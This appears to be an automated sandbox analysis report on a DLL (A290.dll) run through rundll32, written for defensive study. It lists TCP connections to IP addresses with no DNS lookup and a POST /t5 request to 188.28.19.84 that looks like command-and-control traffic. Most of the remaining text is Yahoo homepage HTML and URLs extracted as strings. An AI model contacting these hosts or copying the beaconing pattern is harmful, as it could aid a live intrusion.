Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 151.65.167.77
Source: unknown TCP traffic detected without corresponding DNS query: 188.28.19.84
Source: unknown TCP traffic detected without corresponding DNS query: 188.28.19.84
Source: unknown TCP traffic detected without corresponding DNS query: 188.28.19.84
Source: unknown TCP traffic detected without corresponding DNS query: 188.28.19.84
Source: unknown TCP traffic detected without corresponding DNS query: 188.28.19.84
Source: unknown TCP traffic detected without corresponding DNS query: 188.28.19.84
Source: unknown TCP traffic detected without corresponding DNS query: 188.28.19.84
Source: unknown TCP traffic detected without corresponding DNS query: 188.28.19.84
Source: unknown TCP traffic detected without corresponding DNS query: 188.28.19.84
Source: unknown TCP traffic detected without corresponding DNS query: 86.97.55.89
Source: YWUEZVG8.htm.26.dr String found in binary or memory: C = {"useYAC":0,"usePE":0,"servicePath":"https:\/\/www.yahoo.com\/pdarla\/php\/fc.php","xservicePath":"","beaconPath":"https:\/\/www.yahoo.com\/pdarla\/php\/b.php","renderPath":"","allowFiF":false,"srenderPath":"https:\/\/s.yimg.com\/rq\/darla\/4-11-1\/html\/r-sf.html","renderFile":"https:\/\/s.yimg.com\/rq\/darla\/4-11-1\/html\/r-sf.html","sfbrenderPath":"https:\/\/s.yimg.com\/rq\/darla\/4-11-1\/html\/r-sf.html","msgPath":"https:\/\/fc.yahoo.com\/unsupported-1946.html","cscPath":"https:\/\/s.yimg.com\/rq\/darla\/4-11-1\/html\/r-csc.html","root":"pdarla","edgeRoot":"https:\/\/s.yimg.com\/rq\/darla\/4-11-1","sedgeRoot":"https:\/\/s.yimg.com\/rq\/darla\/4-11-1","version":"4-11-1","tpbURI":"","hostFile":"https:\/\/s.yimg.com\/rq\/darla\/4-11-1\/js\/g-r-min.js","beaconsDisabled":true,"rotationTimingDisabled":true,"fdb_locale":"What don't you like about this ad?|It's offensive|Something else|Thank you for helping us improve your Yahoo experience|It's not relevant|It's distracting|I don't like this ad|Send|Done|Why do I see ads?|Learn more about your feedback.|Want an ad-free inbox? Upgrade to Yahoo Mail Pro!|Upgrade Now","positions":{"DEFAULT":{"supports":false},"LDRB":{"w":728,"h":90},"LREC":{"w":300,"h":250},"MAST":{"w":1,"h":1},"MON":{"w":1,"h":1}},"lang":"en-US"}, equals www.yahoo.com (Yahoo)
Source: YWUEZVG8.htm.26.dr String found in binary or memory: C.events = {"AUTO":{"autoDDG":1,"autoIV":1,"autoMax":25,"autoRT":10000,"autoStart":1,"name":"AUTO","ps":{"LREC":{"autoIV":1,"autoMax":25,"autoRT":"10000"},"LREC3":{"autoIV":1,"autoMax":25,"autoRT":"10000"},"LREC4":{"autoIV":1,"autoMax":25,"autoRT":"10000"},"MON":{"autoIV":1,"autoMax":25,"autoRT":"10000"},"MON2":{"autoIV":1,"autoMax":25,"autoRT":"10000"}},"groups":{"LREC3":"MON2","LREC4":"MON2","MON2":"LREC3,LREC4"},"sp":2023538075,"sa":"Y-BUCKET=\"900\" ctout=380 rs=\"lu:0;pt:home;site:fp;ver:megastrm\" refresh=true","ref":"https:\/\/www.yahoo.com\/","ult":{"pg":{"property":"fp_en-US","rid":"62257iti7d3i8","test":"900"}}},"adFetch":{"ps":"LDRB,LREC,MAST,MON","sp":2023538075,"sa":"Y-BUCKET=\"900\" ctout=380 rs=\"lu:0;pt:home;site:fp;ver:megastrm\"","ref":"https:\/\/www.yahoo.com\/","ult":{"pg":{"property":"fp_en-US","rid":"62257iti7d3i8","test":"900"}}}}; equals www.yahoo.com (Yahoo)
Source: YWUEZVG8.htm.26.dr String found in binary or memory: C.positions = {"LDRB":{"clean":"sda-LDRB","dest":"sda-LDRB-iframe","fdb":1,"h":90,"id":"LDRB","metaSize":true,"pos":"LDRB","supports":{"exp-ovr":1,"exp-push":1,"lyr":0},"w":728,"meta":{"hostURL":"https:\/\/www.yahoo.com\/"}},"LREC":{"clean":"sda-LREC","dest":"sda-LREC-iframe","fdb":1,"h":250,"id":"LREC","metaSize":true,"pos":"LREC","supports":{"exp-ovr":0,"exp-push":0,"lyr":0},"w":300,"meta":{"hostURL":"https:\/\/www.yahoo.com\/"},"doubleBuffering":false},"MAST":{"clean":"sda-MAST","closeBtn":{"adc":0,"mode":2,"useShow":1},"dest":"sda-MAST-iframe","fdb":1,"h":250,"id":"MAST","metaSize":true,"pos":"MAST","supports":{"exp-ovr":0,"exp-push":1,"resize-to":1},"w":970,"meta":{"hostURL":"https:\/\/www.yahoo.com\/"}},"MON":{"clean":"sda-MON","dest":"sda-MON-iframe","fdb":1,"h":600,"id":"MON","metaSize":true,"pos":"MON","supports":{"exp-ovr":1,"exp-push":1,"lyr":0,"resize-to":1},"w":300,"meta":{"hostURL":"https:\/\/www.yahoo.com\/"}},"DEFAULT":{"sandbox":false}}; equals www.yahoo.com (Yahoo)
Source: YWUEZVG8.htm.26.dr String found in binary or memory: w._comscore.push({"c1":"2","c2":"7241469","c5":2023538075,"c7":"https://www.yahoo.com/","c14":-1}); equals www.yahoo.com (Yahoo)
Source: YWUEZVG8.htm.26.dr String found in binary or memory: var pixelDetectUrl = "https://www.yahoo.com/px.gif"; equals www.yahoo.com (Yahoo)
Source: YWUEZVG8.htm.26.dr String found in binary or memory: {"@context":"http://schema.org","@type":"WebSite","url":"https://www.yahoo.com/","potentialAction":{"@type":"SearchAction","target":"https://search.yahoo.com/search?p={search_term_string}","query-input":"required name=search_term_string"}} equals www.yahoo.com (Yahoo)
Source: YWUEZVG8.htm.26.dr String found in binary or memory: </script><noscript><img src=https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c5=2023538075&c7=https%3A%2F%2Fwww.yahoo.com%2F&c14=-1></noscript><script type=text/javascript nonce=9fed29942f93d952c4078d7d1426bc778ee3c135cce17ba6c34e363dabf90f17> equals www.yahoo.com (Yahoo)
Source: YWUEZVG8.htm.26.dr String found in binary or memory: Abs, Major Underboob, And Massive Rock On IG</span><u class="StretchedBox"></u></a></h3><p class="LineClamp(2,38px) finance-ticker-fetch-success_D(n) sub-upsell-fetch-success_D(n) Fz(14px) Lh(18px) C($streamSummaryClass) M(0) Bxz(bb) Mb(12px)" data-test-locator="stream-item-summary">Bella Thorne just got engaged and she took the moment to show off her mega-toned abs in an underboob-baring top. Bella is all about feeling good in your body.</p></div></div><div class="drawer-fetch-boundary Pos(r)"><div data-bucket="900" data-cfg="{&quot;adMeta&quot;:{&quot;adchoicesUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;advertiseWithUsUrl&quot;:&quot;https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;,&quot;sponsoredUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;enableDrawerFeedback&quot;:false,&quot;enableAdLiteUpSellFeedback&quot;:true},&quot;features&quot;:{},&quot;i13n&quot;:{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;Celebrity&quot;,&quot;cpos&quot;:16,&quot;cposy&quot;:33},&quot;intlFujiUiConfig&quot;:{&quot;roundedCorner&quot;:false,&quot;useVerticalControlIcons&quot;:false},&quot;xhrPathPrefix&quot;:&quot;/fp_ms/_rcv/remote&quot;,&quot;ncpParams&quot;:{&quot;query&quot;:{&quot;pageContext&quot;:{&quot;lu&quot;:0,&quot;pageType&quot;:&quot;home&quot;,&quot;site&quot;:&quot;fp&quot;,&quot;appName&quot;:&quot;megastrm&quot;}}}}" data-wf-boundary="drawer-fetch-boundary" data-wf-retry-count="1" data-wf-target=".drawer-fetch-target" data-wf-trigger="onLoad" data-wf-url="/fp_ms/_rcv/remote?m_mode=json&amp;m_id=react-wafer-stream&amp;ctrl=StreamRelated" class="stream-drawer Trsde(0.3s) Trsdu(0.7s) Trstf(eio) Trsp(max-height) Mah(0px) show-drawer_Mah(280px) D(n) drawer-beacon_D(b) Ov(h) stream-related-drawer"><div class="drawer-fetch-target"></div></div><div class="adfeedback-dialog"> </div></div></div></li><li class="stream-item js-stream-content Pos(r) Bgc(--white)" data-type="1" data-uuid="fa9fcd1b-4126-3c4a-8414-306cfbe5708c" data-cpos="17" data-cposy="34" data-ycts="001000637" data-wikis="Washington,_California,California,Yuba_River" data-property="U.S." data-i13n-cfg="{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;U.S.&quot;,&quot;cpos&quot;:17,&quot;cposy&quot;:34}" data-test-locator="stream-item" data-yaft-module="stream_item_17"><div class="Mih(140px)"><div class="Py(12px) Pos(r) Cf"><div class="Fl(start) Pos(r) Mend(25px) Maw(220px) W(26%)"><div class="H(0) T(0px) Bdrs(2px) Start(0) Pos(r)" style="padding-bottom:55.91%" data-test-locator="stream-item-image"><a href="/news/bear-swept-raging-rapids-no-205839118.html" data-ylk="itc:0;elm:img;elmt:ct;imgt:ss;bpos:1;cpos:17;cposy:34;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:story;g:fa9fcd1b-4126-3c4a-8414-306cfbe5708c;grpt:singlestory;pkgt:orphan_img;pos:1;cnt_tpc:U.S.;slk:Bear is swep
Source: YWUEZVG8.htm.26.dr String found in binary or memory: Booty In A Naked Dress At Cannes</span><u class="StretchedBox"></u></a></h3><p class="LineClamp(2,38px) finance-ticker-fetch-success_D(n) sub-upsell-fetch-success_D(n) Fz(14px) Lh(18px) C($streamSummaryClass) M(0) Bxz(bb) Mb(12px)" data-test-locator="stream-item-summary">Shay Mitchell hit up Cannes in a naked dress that showed off her mega-toned butt and legs in new photos. She likes to fit in workouts with the Openfit app.</p></div></div><div class="drawer-fetch-boundary Pos(r)"><div data-bucket="900" data-cfg="{&quot;adMeta&quot;:{&quot;adchoicesUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;advertiseWithUsUrl&quot;:&quot;https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;,&quot;sponsoredUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;enableDrawerFeedback&quot;:false,&quot;enableAdLiteUpSellFeedback&quot;:true},&quot;features&quot;:{},&quot;i13n&quot;:{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;Lifestyle&quot;,&quot;cpos&quot;:21,&quot;cposy&quot;:42},&quot;intlFujiUiConfig&quot;:{&quot;roundedCorner&quot;:false,&quot;useVerticalControlIcons&quot;:false},&quot;xhrPathPrefix&quot;:&quot;/fp_ms/_rcv/remote&quot;,&quot;ncpParams&quot;:{&quot;query&quot;:{&quot;pageContext&quot;:{&quot;lu&quot;:0,&quot;pageType&quot;:&quot;home&quot;,&quot;site&quot;:&quot;fp&quot;,&quot;appName&quot;:&quot;megastrm&quot;}}}}" data-wf-boundary="drawer-fetch-boundary" data-wf-retry-count="1" data-wf-target=".drawer-fetch-target" data-wf-trigger="onLoad" data-wf-url="/fp_ms/_rcv/remote?m_mode=json&amp;m_id=react-wafer-stream&amp;ctrl=StreamRelated" class="stream-drawer Trsde(0.3s) Trsdu(0.7s) Trstf(eio) Trsp(max-height) Mah(0px) show-drawer_Mah(280px) D(n) drawer-beacon_D(b) Ov(h) stream-related-drawer"><div class="drawer-fetch-target"></div></div><div class="adfeedback-dialog"> </div></div></div></li><script class="stream-uuid-list" type="application/json" nonce="9fed29942f93d952c4078d7d1426bc778ee3c135cce17ba6c34e363dabf90f17">{"uuidList":["f4a31bd8-52a0-390c-9724-d4940f6856d0","eee10156-ed77-33aa-8de8-f2a0c2b19331","c744b922-8429-3619-bffa-8817a3bc01c1","39362670714","26782943-a822-36a3-a563-f2d7ec146681","265639c4-84d8-32bb-86cf-617e01201aa8","6b746654-6874-39e2-bbdd-0f42c12ed722","bba5b75d-cad3-3e5b-9a53-aa8b3235991e","40bfa048-5af3-31e7-b557-cf356bab88c4","bf91b542-6dd3-3783-90ff-2beeab346466","a30448d9-3077-3ca5-a6b7-fbb569663620","55cd3b73-b530-3b32-81aa-54f0a914adff","17534886-7333-3a68-996a-6f10c610d0ef","a0baa0a2-af3c-3d82-8b7d-7bce57a7699b","9eb93f5a-d12f-3d34-80b3-8fa147146ac9","5b450b10-0d94-3575-97da-47ae363fa9f8","35363e57-d5e8-31bc-a290-5227cab52cbe","16bd6d13-8675-3de3-99f8-7656ee5640f9","2719a581-9c2b-31d6-b08e-807cfa7eae7d","ef1fbfb3-31ca-39d2-9a4b-36f932f00be0","c1f6e82a-f0f3-30e9-88fd-f550011cf1c0","38fa5320-1213-3155-b6f5-0d0b1d1cac67","7a331f34-2fd5-3226-b156-768746ac18b5","38510797499","9cf7cbfa-2cfb-3
Source: YWUEZVG8.htm.26.dr String found in binary or memory: Right Wingers</div><div class="C($streamItemGray) Fz(11px) Mt(2px) Va(b) D(ib)--md1160" data-test-locator="stream-cluster-pub">Rolling Stone</div></a></li></ul></div></div><div class="drawer-fetch-boundary Pos(r)"><div data-bucket="900" data-cfg="{&quot;adMeta&quot;:{&quot;adchoicesUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;advertiseWithUsUrl&quot;:&quot;https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;,&quot;sponsoredUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;enableDrawerFeedback&quot;:false,&quot;enableAdLiteUpSellFeedback&quot;:true},&quot;features&quot;:{},&quot;i13n&quot;:{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;U.S.&quot;,&quot;cpos&quot;:5,&quot;cposy&quot;:14},&quot;intlFujiUiConfig&quot;:{&quot;roundedCorner&quot;:false,&quot;useVerticalControlIcons&quot;:false},&quot;xhrPathPrefix&quot;:&quot;/fp_ms/_rcv/remote&quot;,&quot;ncpParams&quot;:{&quot;query&quot;:{&quot;pageContext&quot;:{&quot;lu&quot;:0,&quot;pageType&quot;:&quot;home&quot;,&quot;site&quot;:&quot;fp&quot;,&quot;appName&quot;:&quot;megastrm&quot;}}}}" data-wf-boundary="drawer-fetch-boundary" data-wf-retry-count="1" data-wf-target=".drawer-fetch-target" data-wf-trigger="onLoad" data-wf-url="/fp_ms/_rcv/remote?m_mode=json&amp;m_id=react-wafer-stream&amp;ctrl=StreamRelated" class="stream-drawer Trsde(0.3s) Trsdu(0.7s) Trstf(eio) Trsp(max-height) Mah(0px) show-drawer_Mah(280px) D(n) drawer-beacon_D(b) Ov(h) stream-related-drawer"><div class="drawer-fetch-target"></div></div><div class="adfeedback-dialog"> </div></div></div></li><li class="stream-item js-stream-content Pos(r) Bgc(--white)" data-type="1" data-uuid="a30448d9-3077-3ca5-a6b7-fbb569663620" data-cpos="6" data-cposy="17" data-ycts="001000661,001000700" data-wikis="Donald_Trump,Jus_soli,Rolling_Stone,Fourteenth_Amendment_to_the_United_States_Constitution,Illegal_immigration" data-property="Politics" data-has-cluster="true" data-i13n-cfg="{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;Politics&quot;,&quot;cpos&quot;:6,&quot;cposy&quot;:17}" data-test-locator="stream-item" data-yaft-module="stream_item_6"><div class="Mih(140px)"><div class="Py(12px) Pos(r) Cf"><div class="Fl(start) Pos(r) Mend(25px) Maw(220px) W(26%)"><div class="H(0) T(0px) Bdrs(2px) Start(0) Pos(r)" style="padding-bottom:87.73%" data-test-locator="stream-item-image"><a href="/entertainment/trump-promises-violate-14th-amendment-193116065.html" data-ylk="itc:0;elm:img;elmt:ct;imgt:ss;bpos:1;cpos:6;cposy:17;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:story;g:a30448d9-3077-3ca5-a6b7-fbb569663620;grpt:storyCluster;pkgt:cluster_all_img;pos:1;cnt_tpc:Politics;slk:Trump Promises to Violate 14th Amendment equals www.yahoo.com (Yahoo)
Source: YWUEZVG8.htm.26.dr String found in binary or memory: t catch them</span><u class="StretchedBox"></u></a></h3><p class="LineClamp(2,38px) finance-ticker-fetch-success_D(n) sub-upsell-fetch-success_D(n) Fz(14px) Lh(18px) C($streamSummaryClass) M(0) Bxz(bb) Mb(12px)" data-test-locator="stream-item-summary">If you find one on a beach, you should call the state Department of Fish and Wildlife to report it, columnist Carly Vester writes.</p></div></div><div class="drawer-fetch-boundary Pos(r)"><div data-bucket="900" data-cfg="{&quot;adMeta&quot;:{&quot;adchoicesUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;advertiseWithUsUrl&quot;:&quot;https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;,&quot;sponsoredUrl&quot;:&quot;https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;,&quot;enableDrawerFeedback&quot;:false,&quot;enableAdLiteUpSellFeedback&quot;:true},&quot;features&quot;:{},&quot;i13n&quot;:{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;U.S.&quot;,&quot;cpos&quot;:7,&quot;cposy&quot;:20},&quot;intlFujiUiConfig&quot;:{&quot;roundedCorner&quot;:false,&quot;useVerticalControlIcons&quot;:false},&quot;xhrPathPrefix&quot;:&quot;/fp_ms/_rcv/remote&quot;,&quot;ncpParams&quot;:{&quot;query&quot;:{&quot;pageContext&quot;:{&quot;lu&quot;:0,&quot;pageType&quot;:&quot;home&quot;,&quot;site&quot;:&quot;fp&quot;,&quot;appName&quot;:&quot;megastrm&quot;}}}}" data-wf-boundary="drawer-fetch-boundary" data-wf-retry-count="1" data-wf-target=".drawer-fetch-target" data-wf-trigger="onLoad" data-wf-url="/fp_ms/_rcv/remote?m_mode=json&amp;m_id=react-wafer-stream&amp;ctrl=StreamRelated" class="stream-drawer Trsde(0.3s) Trsdu(0.7s) Trstf(eio) Trsp(max-height) Mah(0px) show-drawer_Mah(280px) D(n) drawer-beacon_D(b) Ov(h) stream-related-drawer"><div class="drawer-fetch-target"></div></div><div class="adfeedback-dialog"> </div></div></div></li><li class="stream-item js-stream-content Pos(r) Bgc(--white)" data-type="1" data-uuid="9eb93f5a-d12f-3d34-80b3-8fa147146ac9" data-cpos="8" data-cposy="21" data-ycts="001000069,001000117" data-wikis="Zooey_Deschanel,Christina_Applegate,Blond" data-property="Celebrity" data-has-cluster="true" data-i13n-cfg="{&quot;bpos&quot;:1,&quot;categoryLabel&quot;:&quot;Celebrity&quot;,&quot;cpos&quot;:8,&quot;cposy&quot;:21}" data-test-locator="stream-item" data-yaft-module="stream_item_8"><div class="Mih(140px)"><div class="Py(12px) Pos(r) Cf"><div class="Fl(start) Pos(r) Mend(25px) Maw(220px) W(26%)"><div class="H(0) T(0px) Bdrs(2px) Start(0) Pos(r)" style="padding-bottom:87.73%" data-test-locator="stream-item-image"><a href="/lifestyle/zooey-deschanel-big-blonde-hair-184802299.html" data-ylk="itc:0;elm:img;elmt:ct;imgt:ss;bpos:1;cpos:8;cposy:21;rspns:nav;t1:a3;t2:strm;t3:ct;ccode:megastream_unified__en-US__frontpage__default__default__desktop__ga__noSplit;ct:story;g:9eb93f5a-d12f-3d34-80b3-8fa147146ac9;grpt:storyCluster;pkgt:cluster_all_img;pos:1;cnt_tpc:Celebrity;slk:Zooey Deschanel With B
Source: YWUEZVG8.htm.26.dr String found in binary or memory: http://schema.org
Source: Amcache.hve.9.dr String found in binary or memory: http://upx.sf.net
Source: YWUEZVG8.htm.26.dr String found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://5.ras.yahoo.com/adcount%7C2.0%7C5113.1%7C4830424%7C0%7C0%7CAdId=-41;BnId=0;ct=76544163;st=99
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://5.ras.yahoo.com/adcount%7C2.0%7C5113.1%7C4830441%7C0%7C225%7CAdId=11101911;BnId=2;ct=7654416
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://fp-graviton-home-gateway.media.yahoo.com/
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://legal.yahoo.com/us/en/yahoo/privacy/adinfo/index.html&quot;
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://openweb.jac.yahoosandbox.com
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://openweb.jac.yahoosandbox.com/1.5.0/jac.js
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/aaq/hc/homepage-pwa-defer-1.1.6.js
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/aaq/nel/js/spotIm.custom.SpotIMJAC.modal.9d3270fa67932556c75baaed2c09c955.js
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/aaq/spotim/
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/aaq/vzm/cs_1.4.0.js
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/aaq/wf/wf-core-1.63.0.js
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/cx/pv/perf-vitals_3.1.0.js
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/nn/lib/metro/g/myy/advertisement_0.0.19.js
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/ss/rapid-3.53.38.js
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uc/sf/0.1.322/js/safe.min.js
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/DgW4vH5M_FUgIVI7P1drOg--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/GrbIGl3XT7cxPkRfHGfS9A--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/IOHHaqoGtz8E_nhSi9n_SA--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/JB3oERIZNZLPfu6X4e9z6A--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/M7GzoPQf97leZFwCZRF3Kg--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/NyxskLh1ww_qP2VNMLLXPg--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/YcilHawp_AKChrUBidk12w--~B/Zmk9c3RyaW07aD0zODg7cT05NTt3PTcyMDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/_CIJXKXQDZkVo9bAyJDDdA--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/_thhUXx96QwnlqajJOOzag--~B/Zmk9c3RyaW07aD0yNDY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/bgsoedXfbB0Gb9NBLPpSgA--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/h64YbbKcO2GsKYAy1QMRMw--~B/Zmk9c3RyaW07aD0zODY7cT04MDt3PTQ0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://s.yimg.com/uu/api/res/1.2/xRSr.LEimIgdYlvzWwz1eg--~B/Zmk9c3RyaW07aD0xNDA7cT05MDt3PTE0MDthcHB
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://sb.scorecardresearch.com/p?c1=2&c2=7241469&c5=2023538075&c7=https%3A%2F%2Fwww.yahoo.com%2F&c
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://search.yahoo.com/search?p=
Source: rundll32.exe, rundll32.exe, 00000003.00000002.546649132.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.546624364.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000C.00000002.546734237.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.555876068.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000013.00000002.556014337.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000014.00000002.565392341.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, A290.dll String found in binary or memory: https://streams.videolan.org/upload/
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://www.ad.com/?utm_source=yahoo-home&amp;utm_medium=referral&amp;utm_campaign=ad-feedback&quot;
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://www.yahoo.com/
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://www.yahoo.com/px.gif
Source: YWUEZVG8.htm.26.dr String found in binary or memory: https://yep.video.yahoo.com/oath/js/1/oath-player.js?ypv=8.5.43&lang=en-US
Source: unknown HTTP traffic detected: POST /t5 HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 188.28.19.84Content-Length: 77Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: yahoo.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_1004D9B0 mv_thread_message_queue_recv,AcquireSRWLockExclusive,SleepConditionVariableSRW,SleepConditionVariableSRW,mv_fifo_can_read,mv_fifo_can_read,ReleaseSRWLockExclusive,mv_fifo_read,WakeConditionVariable,mv_fifo_can_read, 3_2_1004D9B0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: yahoo.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.yahoo.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 98.137.11.163:443 -> 192.168.2.4:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.215:443 -> 192.168.2.4:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.28.19.84:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: loaddll32.exe, 00000000.00000002.550583540.00000000014DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: A290.dll Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
